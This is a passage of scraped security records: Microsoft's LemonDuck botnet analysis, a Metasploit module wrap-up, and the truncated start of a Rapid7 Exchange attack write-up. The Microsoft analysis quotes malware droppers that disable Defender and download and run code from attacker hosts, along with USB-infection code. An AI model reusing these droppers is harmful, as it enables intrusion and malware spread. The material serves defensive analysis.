actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initiated behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", 
"href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-26T18:52:42", "description": "## ProxyLogon\n\n\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allowing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects Exchange 2013 versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, and Exchange 2019 CU8 < 15.02.0792.010.\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT 
AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the "/Config/SaveUploadedHotspotLogoFile" upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. 
This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. 
The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. 
The `-s` flag allows one to search by rank, disclosure date, module name, module type, or if the module implements a check method or not. The results will be ordered in ascending order; however, users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex::Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation for Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped, which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages more understandable.\n\n * 
[#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * [#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. 
This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-26T17:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "modified": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing 
detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. 
Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack. Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems to help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.\n\n**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. 
Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/<random_name>.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. 
